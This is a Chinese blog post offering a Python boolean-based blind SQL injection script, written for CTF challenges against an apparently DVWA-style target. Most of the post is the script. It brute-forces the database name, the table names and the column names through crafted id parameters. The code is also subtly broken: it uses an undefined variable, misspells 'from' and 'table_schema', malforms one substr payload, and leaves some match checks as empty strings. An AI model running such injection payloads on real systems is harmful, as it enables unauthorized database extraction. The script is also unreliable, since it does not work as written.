博客园 首页 私信博主 显示目录 隐藏目录 管理
Live2D

SQL注入之布尔盲注脚本

在做ctf时,我们会碰到很多的SQL注入的题目,可能会有各种各样的过滤,有时候sqlmap会无法满足我们的需求,无法绕过各种各样的注入,所以我们需要手写盲注脚本来对注入点进行注入,自己写脚本的好处就是我们可以根据自己的需求对脚本的功能进行修改,达到绕过注入过滤的目的。

import requests

s = requests.session()
url = input("请输入url:")
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890'#mysql字母不区分大小写,所以不用加入大写字母,还有各种符号,可以自由添加
headers = {'cookie':''}#需要登陆的可以在这里加入cookies
#爆破数据库的长度
for l in range(1,50):#这里用来爆破库的长度,非必须,可以将爆破库名时的循环设置的长一点,大于正常库名长度
     databaseLen_payload = '?id=1\' and length(database())= '+str(l) + ' %23&Submit=Submit#'#将#和\号使用url编码,在#号后将完整的url拼接起来
     if  '' in s.get(url+databaseLen_payload,headers=headers).text:# 这里面写入判断布尔型存在的根据
         databaseLen =l
         break
print('database_lenth: '+str(databaseLen))

#爆破数据库的名
database_name = ''#
for l in range(1,databaseLen+1):
    for i in payloads:
        database_payload = '?id=1\' and substr(database(),'+str(i)+'\' %23&Submit=Submit#'#拼接完整的url
        if  '' in s.get(url+database_payload, headers=headers).text:
            database_name += i
print('database_name:'+database_name)

#爆破表的个数
for l in range(1,50):
    tableNum_payload = '?id=1\'and(select count(table_name) from information_schema.tables where table_schema=database())='+str(j)+' %23&Submit=Submit#'
    if '' in s.get(url+tableNum_payload,headers=headers).text:
        tableNum =l
        break
print('tableNum:'+str(tableNum))

#爆出所有的表名
#先爆出表名的长度
for l in range(0,tableNum):
    table_name = ''
    for i in range(1,50):
        tableLen_payload = '?id=1\' and length(substr((select table_name form information_schema.tables where tale_schema=database() limit ' +str(l) +',1),1))=' +str(i) +' %23&Submit = Submit#'
               # 用法substr('This is a test', 6) 返回'is a test'
        if '' in s.get(url+tableLen_payload, headers=headers).text:
            tableLen = i
            print('table'+str(j+1)+'_length: '+str(tableLen))
            # (2)内部循环爆破每个表的表名
            for m in range(1,tableLen+1):
                for n in payloads: # i在上个循环用过了
                    table_payload = '?id=1\' and substr((select table_name from information_schema.tables where table_schema=database() limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#'
                    if 'User ID exists in the database.' in s.get(url+table_payload, headers=headers).text:
                        table_name += n
            print('table'+str(j+1)+'_name: '+table_name)

#根据上个脚本获得的结果,来跑对应表中的字段

s =requests.session()  #保持会话

#判断表中的字段数目
columnNum = 0
for l in range(50):
    columnNum_payload = '?id=1\' and(select count(column_name)from information_schema.columns where table_name = \ '') = 'str(l)+'%23&Submit = Submit'
    if '' in s.get(url+columnNum_payload,headers=headers).text:
        columnNum = l
        break
print('columnNum:'+str(columnNum))

#爆出每个字段的长度
for l in  range(0,columnNum):
    column_name = ''
    for i in range(1,50):
        columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str(
            j) + ',1),1))=' + str(i) + ' %23&Submit=Submit#'
        if 'User ID exists in the database.' in s.get(url + columnLen_payload, headers=headers).text:
            columnLen = i
            print('column' + str(j + 1) + '_length: ' + str(columnLen))

            # (2)内部循环爆破每个表的表名
            for m in range(1, columnLen + 1):
                for n in payloads:  # i在上个循环用过了
                    column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str(
                        j) + ',1),' + str(m) + ',1)=\'' + str(n) + '\' %23&Submit=Submit#'
                    if 'User ID exists in the database.' in s.get(url + column_payload, headers=headers).text:
                        column_name += n
            print('column' + str(j + 1) + '_name: ' + column_name)

这种脚本还是比较简单的,我们可以在碰到具体的题时,对脚本内容进行修改,实现各种功能。

posted @ 2020-11-18 10:47  楼--楼  阅读(2813)  评论(0编辑  收藏  举报
(function() { $("pre").addClass("prettyprint"); prettyPrint(); })();